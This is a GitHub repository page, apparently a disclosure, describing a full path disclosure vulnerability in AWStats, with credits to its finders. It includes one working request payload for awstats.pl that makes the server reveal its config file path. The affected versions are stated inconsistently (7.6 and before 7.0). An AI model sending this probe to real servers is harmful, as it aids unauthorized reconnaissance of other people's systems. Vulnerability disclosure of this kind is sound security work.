Skip to content

theyiyibest/AWStatsFullPathDisclosure

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
README.md
README.md
 
 
full-path.jpg
full-path.jpg
 
 

Repository files navigation

AWStatsFullPathDisclosure

Full Path Disclosure at AWStats 7.6 or minor versions

Full Path Disclosure vulnerability in AWStats before 7.0 or minor versions allows remote attackers to know where config file is allocated, obtaining full path of server.

PAYLOAD: awstats.pl?framename=mainright&update=123123123123

RESULT:

alt text

Found by: JuanRi Villén, Ruben Gutierrez and Yeray Fernández

About

Full Path Disclosure at AWStats 7.6 or minor versions

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published